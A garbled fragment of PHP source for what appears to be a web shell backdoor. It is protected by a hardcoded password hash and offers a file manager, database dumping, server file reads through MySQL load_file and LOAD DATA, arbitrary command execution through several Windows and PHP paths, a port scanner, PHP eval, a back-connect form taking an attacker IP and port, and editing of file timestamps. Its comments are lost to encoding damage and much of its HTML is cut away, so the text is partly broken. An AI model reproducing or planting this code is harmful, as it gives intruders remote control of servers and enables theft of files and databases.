$value) { if (IS_GPC) { $value = s_array($value); } $$key = $value; } /*===================== ???? =====================*/ //echo encode_pass('angel');exit; //angel = ec38fe2a8497e0a8d6d349b3533038cb // ????????,???????,???????? $pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel //??? cookie ?????????, ??????, ???????, ??????? // cookie ?? $cookiepre = ''; // cookie ??? $cookiedomain = ''; // cookie ???? $cookiepath = '/'; // cookie ??? $cookielife = 86400; //??????????? !$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp'; /*===================== ???? =====================*/ $charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8'); if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } elseif ($charset == 'euc-kr') { header("content-Type: text/html; charset=euc-kr"); } elseif ($charset == 'euc-jp') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== ???? =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: '.$self); exit; } if($pass) { if ($action == 'login') { if ($pass == encode_pass($password)) { scookie('loginpass',encode_pass($password)); @header('Location: '.$self); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /*===================== ???? =====================*/ $errmsg = ''; !$action && $action = 'file'; // ??PHPINFO if ($action == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); exit; } else { $errmsg = 'phpinfo() function has non-permissible'; } } // ???? if ($doing == 'downfile' && $thefile) { if (!@file_exists($thefile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $fileinfo = pathinfo($thefile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($thefile)); @readfile($thefile); exit; } } // ????????? if ($doing == 'backupmysql' && !$saveasfile) { if (!$table) { $errmsg ='Please choose the table'; } else { $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $filename = basename($dbname.'.sql'); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); foreach($table as $k => $v) { if ($v) { sqldumptable($v); } } mysql_close(); exit; } } // ??MYSQL???? if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_angel;"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); //?????????,???????????__angel_1111111111_eof__?????????? q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); $result = q("select content from tmp_angel"); q("DROP TABLE tmp_angel"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?>
/ User: () |
PHP / Safe Mode: Logout | File Manager | MYSQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Port Scan | Security information | Eval PHP Code | Back Connect |
'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform', 'target'=>'_blank'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
formhead(array('name'=>'getsize'));
makehide('getdir');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
p('File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)'); $cwd_links = ''; $path = explode('/', $nowpath); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= ''.$path[$i].'/'; } ?>
';
$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
$comma = '';
foreach($obj->Drives as $drive) {
if ($drive->Path) {
p($comma.''.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')');
$comma = '|';
}
}
echo ' ';
}
}
?>
| '); p(''); p('WebRoot'); p(' | ScriptPath'); p(' | View All'); p(' | View Writable ( Directory'); p(' | File )'); p(' | Create Directory | Create File'); p(' | ||||||||
Filename | Last modified | Size | Chmod / Perms | Action |
'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); p('
'); formfoot(); p(''); } elseif ($action == 'mysqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $fp = @fopen($path,'w'); if ($fp) { foreach($table as $k => $v) { if ($v) { sqldumptable($v, $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } formhead(array('title'=>'MYSQL Manager')); makehide('action','mysqladmin'); p(''); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('
'); formfoot(); //???? formhead(array('name'=>'recordlist')); makehide('doing'); makehide('action','mysqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); //????? formhead(array('name'=>'setdbname')); makehide('action','mysqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); //??? formhead(array('name'=>'settable')); makehide('action','mysqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); //??????? $mysqlver = mysql_get_server_info(); p('MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'
'); $highver = $mysqlver > '4.1' ? 1 : 0; //????? $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p(''); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('
'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p(''); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW FULL COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('Field | '); p('Type | '); p('Collation | '); p('Null | '); p('Key | '); p('Default | '); p('Extra | '); p('Privileges | '); p('Comment | '); p('|
'.$row['Field'].' | '); p(''.$row['Type'].' | '); p(''.$row['Collation'].' | '); p(''.$row['Null'].' | '); p(''.$row['Key'].' | '); p(''.$row['Default'].' | '); p(''.$row['Extra'].' | '); p(''.$row['Privileges'].' | '); p(''.$row['Comment'].' | '); p('
Keyname | '); p('Type | '); p('Unique | '); p('Packed | '); p('Seq_in_index | '); p('Field | '); p('Cardinality | '); p('Collation | '); p('Null | '); p('Comment | '); p('
'.$row['Key_name'].' | '); p(''.$row['Index_type'].' | '); p(''.($row['Non_unique'] ? 'No' : 'Yes').' | '); p(''.($row['Packed'] === null ? 'No' : $row['Packed']).' | '); p(''.$row['Seq_in_index'].' | '); p(''.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' | '); p(''.($row['Cardinality'] ? $row['Cardinality'] : 0).' | '); p(''.$row['Collation'].' | '); p(''.$row['Null'].' | '); p(''.$row['Comment'].' | '); p('
Action | '); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p("$name $type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')." | ");
}
p('
'.html_clean($inside).' | '; } $where = base64_encode($where); if ($allowedit) p('Edit | Del | '); p($b1); p('
Action | '); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p("$name $type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')." | ");
}
p('
'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('
'); formfoot(); }//end elseif ($action == 'portscan') { !$scanip && $scanip = '127.0.0.1'; !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; formhead(array('title'=>'Port Scan')); makehide('action','portscan'); p(''); p('IP:'); makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip)); p('Port:'); makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport)); makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt')); p('
'); formfoot(); if ($startscan) { p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('
'); formfooter(); goback(); }//end newtime elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p(''); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('
'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p(''); makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command))); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('
'); formfoot(); if ($command) { p(''); if ($execfunc=='wscript' && IS_WIN && IS_COM) { $wsh = new COM('WScript.shell'); $exec = $wsh->exec('cmd.exe /c '.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) { $descriptorspec = array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ); $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command."\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); } } else { echo(execute($command)); } p(''); } }//end shell elseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a<2;$a++) { p('
'.$v.''); p('
Pages: '.$multipage.'
' : ''; } return $multipage; } // ???? function loginpage() { ?>